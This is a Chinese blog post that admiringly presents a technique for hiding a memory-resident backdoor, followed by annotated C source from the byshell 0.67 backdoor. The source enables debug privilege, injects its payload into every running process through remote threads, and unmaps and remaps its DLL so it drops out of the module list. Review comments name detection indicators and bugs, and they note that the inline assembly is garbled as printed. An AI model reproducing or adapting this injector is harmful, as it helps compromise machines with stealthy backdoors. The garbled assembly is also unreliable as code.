
一个不错的隐藏后门思路

2014-03-31 16:05
一个不错的隐藏后门思路:通过远程线程把 DLL 注射到系统进程,随后解除 DLL 映射,并删除自身的 DLL 和 EXE 文件以及自身创建的服务,使后门仅存在于内存中。于是在寄主机器上找不到任何新增服务项、磁盘文件或进程模块列表中的不明 DLL。关机时,该程序会截获关机调用,在系统关闭之前恢复自己。缺点是非正常重启之后后门即消失。需要注意的是,这种“不可见”仅限于模块列表和磁盘:从下面的代码可以看到,载荷仍驻留在目标进程中由 VirtualAllocEx/VirtualAlloc 分配的私有可读写可执行(RWX)内存区域里,固定使用 0x19850000 这一基址,并创建名为 by067clean、by067revive、by067check、by067filemapping 的命名内核对象——这些都是内存取证和主机检测可以直接识别的特征。
 
 
以下代码引自byshell0.67,你可以从Xfocus上获取源代码(baiyuanfan大侠的作品撒~)一直没看过后门那些东西的,今天别人提到,没想到有这么不错的东西啊...... 
 
 

/*
 * injcode - inject the memory-resident payload into every process.
 *
 * Injector half of the byshell 0.67 loader. It enables SeDebugPrivilege on
 * its own token, creates the named kernel objects the implant's parts use
 * to find each other, grants Everyone full access to the shared section,
 * then walks the process list and, for each process not already carrying
 * the payload, copies injfunc() plus a table of kernel32 entry points into
 * the target and starts the copy on a remote thread.
 *
 * Depends on names outside this listing: the global injapistr (an
 * INJAPISTR, see injfunc), MAINPROC1 / MAINPROC2 (process names that
 * select a non-zero ismainthread value) and, at runtime, ntboot.dll being
 * loadable at 0x19850000 (see injfunc). No parameters, no return value;
 * failures are only reported in bydbg debug builds via int 3.
 *
 * Host-based indicators this code leaves behind (all visible below): the
 * object names "by067clean", "by067revive", "by067check",
 * "by067filemapping"; a readable page at 0x19850000 in every infected
 * process; and private PAGE_EXECUTE_READWRITE regions created with
 * VirtualAllocEx whose start address is used as a remote-thread entry.
 *
 * NOTE(review): HANDLE values are stored in the int `ret`, so this is
 * 32-bit-only code (the original target platform); on 64-bit the casts
 * truncate handles.
 */
void injcode(){HANDLE prohandle;DWORD pid=0;int ret;int tmp;HANDLE fm;

//SE_DEBUG_NAME
// Enable SeDebugPrivilege so OpenProcess(PROCESS_ALL_ACCESS) works on
// service/SYSTEM processes. None of the three calls is checked: if the
// caller lacks the privilege (non-admin), AdjustTokenPrivileges quietly
// does nothing and the OpenProcess calls below simply fail later.

HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;

LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);

//retrieve pid from toolhelp32

Sleep(1000);

// Snapshot of all processes; the handle is not checked for
// INVALID_HANDLE_VALUE before use.
HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);

// Global named objects used as IPC/rendezvous between the implant's
// components. These names are fixed strings and therefore act as
// host-based indicators. Note that CreateMutex/CreateEvent also succeed
// (with ERROR_ALREADY_EXISTS) when the object already exists, so the
// `!ret` checks do not detect a previously running instance; the handles
// are never closed, which is intentional for objects that must outlive
// this function.
ret=(int)CreateMutex(0,0,"by067clean");

if(!ret){MessageBox(0,0,0,0);goto err1;}

ret=(int)CreateMutex(0,0,"by067revive");

if(!ret){MessageBox(0,0,0,0);goto err1;}

ret=(int)CreateEvent(0,0,1,"by067check");// initial state is signaled (1) — remember this!

if(!ret){MessageBox(0,0,0,0);goto err1;}

// 1 KB pagefile-backed shared section ((HANDLE)-1 == INVALID_HANDLE_VALUE
// means "not backed by a file").
fm=CreateFileMapping((HANDLE)-1,0,PAGE_READWRITE,0,1024,"by067filemapping");

if(!fm){MessageBox(0,0,0,0);goto err1;}

// The file mapping's DACL must allow everyone read/write.
// Security note: the ACE below grants GENERIC_ALL to the group "EVERYONE",
// so any local account in any session can read and rewrite this section.
// Whatever the implant exchanges through it is therefore writable by a
// low-privilege local process. The psd and pnewdacl returned by
// GetSecurityInfo/SetEntriesInAcl are never LocalFree'd (leak).

PACL pdacl;

PACL pnewdacl;

PSECURITY_DESCRIPTOR psd;

EXPLICIT_ACCESS ace;

int ret1;

GetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,&pdacl,0,&psd);

ace.grfAccessPermissions=GENERIC_ALL;

ace.grfAccessMode=GRANT_ACCESS;

ace.grfInheritance=NO_INHERITANCE;

ace.Trustee.pMultipleTrustee=0;

ace.Trustee.MultipleTrusteeOperation=NO_MULTIPLE_TRUSTEE;

ace.Trustee.TrusteeForm=TRUSTEE_IS_NAME;

ace.Trustee.TrusteeType=TRUSTEE_IS_GROUP;

ace.Trustee.ptstrName="EVERYONE";

SetEntriesInAcl(1,&ace,pdacl,&pnewdacl);

ret1=SetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pnewdacl,0);

if(ret1){goto err2;}

//char injexe[]="explorer.exe";//for dbg only process

// Walk the process list. The entry filled in by Process32First is never
// examined: the loop condition advances with Process32Next before the
// body runs, so iteration effectively starts at the second entry.
for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);){

//if(stricmp(processsnap.szExeFile,injexe)){continue;}

// Skip the very low PIDs (idle/System).
if(processsnap.th32ProcessID<10){continue;}

// Tag the two "main" host processes (names defined elsewhere) via the
// ismainthread field; injfunc passes this value on to CmdService.
if(!stricmp(processsnap.szExeFile,MAINPROC1)){injapistr.ismainthread=1;}

else if(!stricmp(processsnap.szExeFile,MAINPROC2)){injapistr.ismainthread=2;}

else{injapistr.ismainthread=0;}

pid=processsnap.th32ProcessID;



//inj

// Full access, inheritable handle. The result is not checked: if this
// fails (protected process, missing privilege) prohandle is NULL, the
// probe below fails and the injection steps are attempted on a NULL
// handle; only the bydbg build reports it.
prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);

// Probe for the payload's fixed image base (injfunc insists ntboot.dll
// loads at 0x19850000): a readable dword there means this process is
// already infected. Note the `continue` bypasses the CloseHandle at the
// bottom of the loop, leaking prohandle for every such process.
if(ReadProcessMemory(prohandle,(void*)0x19850000,&tmp,4,(DWORD*)&ret)==1){continue;}

// Already loaded byshell once? Then do nothing.

DWORD WINAPI injfunc(LPVOID);

HMODULE hModule;LPVOID paramaddr;

// Resolve kernel32 exports in *this* process and hand the raw addresses
// to the target through injapistr. This only works when kernel32 is
// mapped at the same base in every process, which is the assumption the
// code makes (the pre-ASLR Windows it was written for).
hModule=LoadLibrary("kernel32.dll");

injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");

injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");

injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");

injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");

injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");

injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");

// Parameter block for the remote thread, allocated RWX although it only
// holds data. Neither the allocation nor the write is checked.
paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);

// Copy 20000 raw bytes starting at injfunc's address into a private RWX
// region of the target. This assumes injfunc is position independent,
// shorter than 20000 bytes, and that reading 20000 bytes past its start
// stays inside mapped memory of this module — nothing verifies any of
// it. NOTE(review): a private RWX region used as a remote-thread start
// address is the pattern memory scanners key on.
void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);

// Run the copy; the returned thread handle is never closed (leak).
ret=(int)CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);

// This inner `tmp` shadows the outer one declared at the top.
if(!ret){int tmp=GetLastError();

#ifdef bydbg

OutputDebugString("cannot infect process:see pid in edx,err code in eax\n");

__asm mov eax,tmp

__asm mov edx,pid

__asm int 3;

#endif

}

CloseHandle(prohandle);



}//end for





CloseHandle(snapshot);

return;



// Error exits: the labels live in blocks placed after the return and are
// reached only by goto. Both leave the objects created so far open.
{

err1:

#ifdef bydbg

OutputDebugString("create global obj failed\n");

__asm int 3;

#endif

return;

}

{

err2:

#ifdef bydbg

OutputDebugString("cannot set DACL of section,see err code in eax\n");

__asm mov eax,ret1

__asm int 3;

#endif

return;

}

}





/*
 * injfunc - thread body that runs inside the target process.
 *
 * Never called directly in this file: injcode() copies 20000 raw bytes
 * starting at its address into the target and points CreateRemoteThread
 * at the copy. Everything here therefore has to be position independent
 * and self-contained — no string literals (they would be pointers into
 * the injector's image), no direct Win32 imports. That is why the two
 * names are assembled a byte at a time with inline asm and why every API
 * is reached through the INJAPISTR table passed in paramaddr. The memcpy
 * calls must end up as compiler intrinsics (inlined) rather than calls
 * into the injector's CRT — presumably /Oi in the original build; confirm
 * if rebuilding.
 *
 * Sequence: LoadLibrary("ntboot.dll"); bail out unless it landed at
 * 0x19850000; resolve its "CmdService" export; copy the mapped image
 * aside, FreeLibrary() it so it disappears from the loader's module list,
 * re-create private RWX memory at the same base and copy the image back;
 * finally call CmdService with the ismainthread flag from the table.
 * Keeping the base identical is what lets the already-resolved imports
 * and relocations in the copied image keep working.
 *
 * paramaddr: INJAPISTR* written into the target by injcode.
 * Returns 0 always (the thread exit code).
 *
 * NOTE(review): the asm operands below read `ntboot 1`, `msgbox 1`, ...
 * with typographic quotes; MASM needs `ntboot+1`, `msgbox+1` and ASCII
 * '...'. The `+` signs and quotes look lost in transcription of the
 * original listing — this is not valid as printed.
 *
 * NOTE(review): after the unmap/remap trick the code still occupies a
 * private (non-image) executable region at 0x19850000 holding a full PE
 * image; it is hidden from anything that walks the PEB module list, not
 * from anything that walks the process's memory regions.
 */
DWORD WINAPI injfunc(LPVOID paramaddr){



// 16-byte stack buffers for "ntboot.dll" and "CmdService" (the latter is
// misnamed `msgbox`); both are 10 chars + NUL.
char ntboot[16];char msgbox[16];

INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr;

// Build the strings on the stack byte by byte so the copied code carries
// no data references.
__asm{

mov ntboot,’n’

mov ntboot 1,’t’

mov ntboot 2,’b’

mov ntboot 3,’o’

mov ntboot 4,’o’

mov ntboot 5,’t’

mov ntboot 6,’.’

mov ntboot 7,’d’

mov ntboot 8,’l’

mov ntboot 9,’l’

mov ntboot 10,0



mov msgbox,’C’

mov msgbox 1,’m’

mov msgbox 2,’d’

mov msgbox 3,’S’

mov msgbox 4,’e’

mov msgbox 5,’r’

mov msgbox 6,’v’

mov msgbox 7,’i’

mov msgbox 8,’c’

mov msgbox 9,’e’

mov msgbox 10,0

}

// Load the payload DLL through the table pointer (LoadLibraryA).
HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);

// Special case: the DLL did not land at its expected base — give up.
// injcode() probes this same address to decide whether a process is
// already infected, so a relocated load would also defeat that check.
if((int)hModule!=0x19850000){return 0;}

DWORD (WINAPI *myCmdService)(LPVOID);

// Resolve the export "CmdService" from the freshly loaded module.
myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox));



// Unused.
unsigned int memsize=0;

// Copy the whole mapped image (DLLIMAGESIZE is defined elsewhere) into a
// temporary RWX buffer; the allocation is not checked.
void * tempdll=pinjapistr->myVirtualAlloc(0,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

memcpy(tempdll,hModule,DLLIMAGESIZE);

// Unload the real module so it leaves the loader's module list, then
// reclaim the same address range as private RWX memory and copy the
// image back. If VirtualAlloc cannot get that exact range it returns
// NULL and the memcpy below writes to address 0, crashing the host
// process — there is no check.
pinjapistr->myFreeLibrary(hModule);

hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

// MEM_DECOMMIT only; the temporary reservation itself is left in place.
memcpy(hModule,tempdll,DLLIMAGESIZE);pinjapistr->myVirtualFree(tempdll,DLLIMAGESIZE,MEM_DECOMMIT);

//



// Hand control to the payload, passing the main-process flag set by
// injcode (0, 1 or 2) as the only argument.
myCmdService((void*)(pinjapistr->ismainthread));

return 0;



}

 


知识来源: www.2cto.com/Article/201403/289528.html

